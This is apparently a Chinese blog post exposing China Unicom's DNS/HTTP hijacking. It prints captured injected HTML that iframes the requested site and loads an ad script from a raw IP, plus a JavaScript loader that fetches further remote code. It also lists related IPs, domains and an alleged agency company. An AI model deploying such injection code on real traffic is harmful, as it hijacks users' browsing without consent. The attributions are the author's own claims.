联通劫持DNS换了一种方式 (附部分代码)

<html><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><title></title><style type='text/css'>body {margin: 0px;padding: 0px;overflow:hidden;}</style></head><body><iframe id='fulliframe' LANG='utf-8' name='fulliframe' src='' width='100%' height='100%' marginheight='0' marginwidth='0' frameborder='0'></iframe><script language='JavaScript' type='text/javascript'>frames['fulliframe'].location = window.location;</script><script src='http://59.51.96.38/pagead/ads.js?umask=90&interval=0&vask=2436730379&uid=1600254828&pid=72902347028409402&o_url=www.1ting.com/&aname=00010730&sc=00010799&ipc_type=CTN&ipc_nid=3' language='javascript' type='text/javascript'></script></body></html>

/pagead/ads.js代码
function mf(){head=document.getElementsByTagName('body').item(0);script=document.createElement('script');script.src='http://61.172.192.73/10080903/images/asd.js';script.type='text/javascript';script.defer=true;void(head.appendChild(script));}mf();

广告js地址:http://61.172.192.73/10080903/images/asd.js (打开这个js发现更多内容)
广告页地址:http://61.172.192.73/10080903/asd.htm 广告页面中有个<img src=http://114.247.10.226/pagead/ads?umask=1&ad_url=http://61.172.192.73/10080903/images/asd.js&website=4c622250&"+document.location.search.substr(1)+">这个IP是正是China Unicom Beijing Province Network,点此查看这个IP的Whois信息
还有一个关联域名dkgtv6.com,Google一下,第一个结果就是 http://a3.dkgtv6.com/mssdtzhsh/index.html 打开看是什么?熟悉么?没错,就是之前北京联通劫持投的民生银行的广告.而u.dkgtv6.com的IP正是114.247.10.226.

弹窗URL:http://61.172.192.73/10080903/clicked.htm
关联公司: izptec 应该是专门代理电信劫持投放业务的.

出现频率很高.说到不要脸,北京联通认第三,没人能赶上第二了.

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据